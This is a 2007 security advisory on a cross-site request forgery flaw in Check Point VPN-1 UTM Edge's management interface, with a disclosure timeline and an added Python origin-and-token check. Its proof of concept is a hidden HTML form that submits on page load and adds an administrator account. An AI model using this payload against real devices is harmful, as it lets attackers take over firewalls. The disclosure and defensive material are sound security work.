VPN-1 UTM Edge appliances deliver "unified threat management to enterprises with branch offices and simplify security deployments and manageability."
During an audit of VPN-1 UTM Edge, a cross-site request forgery (CSRF) vulnerability was discovered in the management interface. An attacker can therefore perform any administrative action in the management interface, for example adding additional admin users.
Credit:
The information has been provided by Henri Lindberg, Associate of (ISC) or Jussi Vuokko, CISSP.
The original article can be found at: http://www.louhi.fi/advisory/checkpoint_070626.txt
The Checkpoint VPN-1 Edge Embedded device management interface does not validate the origin of an HTTP request. If an attacker is able to make a user visit a hostile web page, a VPN-1 Edge device can be controlled by submitting suitable forms. For example, it is possible to add new users.
A successful attack requires that the attacker knows the management interface address of the target device. Because the management interface has no logout functionality, a user can remain vulnerable to this attack even after closing the tab containing the management interface (if the user does not close the browser window or clear cookies, and depending on browser behaviour).
Proof of Concept:
Example form (adds new read-only administrator):
<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="https://fw.example.com/pop/WizU.html" style="display:none">
<input name="swstate" value="WizU1">
<input name="swtosave" value="1">
<input name="swback" value="0">
<input name="swindex" value="-1">
<input name="swuuser" value="evil-user">
<input name="swupass" value="password">
<input name="swuexp" value="0">
<input name="swuday" value="4">
<input name="swumonth" value="5">
<input name="swuyear" value="2008">
<input name="swuhour" value="03">
<input name="swumin" value="11">
<input name="swuampm" value="1">
<input name="swuacc" value="1">
<input name="swuvpn" value="0">
<input name="swuufp" value="0">
<input name="swuhot" value="0">
<input name="tacc" value="1">
</form>
</body>
</html>
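An added example, not part of the original advisory or of the vendor's firmware: one way a management interface can validate request origin before accepting a state-changing POST such as the form above, combining an Origin/Referer check with a per-session token. The trusted origin, server key, session identifier and the `csrf_token` field name are assumptions for illustration.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import urlsplit

# Assumed values for illustration; none come from the device firmware.
TRUSTED_ORIGIN = "https://fw.example.com"
SERVER_KEY = b"constructed-demo-key"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # must never change configuration


def csrf_token(session_id: str) -> str:
    """Per-session token the interface would embed in its own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers: dict) -> Optional[str]:
    """scheme://host[:port] taken from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def allow_request(method: str, headers: dict, form: dict, session_id: str) -> bool:
    """Accept a state-changing request only if origin and token both match."""
    if method.upper() in SAFE_METHODS:
        return True
    if request_origin(headers) != TRUSTED_ORIGIN:
        return False  # cross-site submission, or origin cannot be determined
    expected = csrf_token(session_id).encode()
    return hmac.compare_digest(form.get("csrf_token", "").encode(), expected)


# Constructed sample requests; the browser sends the session cookie with both.
SESSION = "constructed-session-id"
FORGED = ("POST", {"Origin": "https://hostile.example"},
          {"swstate": "WizU1", "swuuser": "evil-user"})
GENUINE = ("POST", {"Origin": TRUSTED_ORIGIN},
           {"swstate": "WizU1", "swuuser": "new-admin",
            "csrf_token": csrf_token(SESSION)})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("genuine", GENUINE)):
        print(name, "->", "accepted" if allow_request(*req, SESSION) else "rejected")
```

The forged request carries a valid session cookie but is rejected because its origin is foreign and it cannot supply the token; requests with no determinable origin are rejected as well.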
Disclosure Timeline:
7. June 2007 - Contacted Checkpoint by email
26. June 2007 - Vendor released an updated version
26. June 2007 - Advisory was released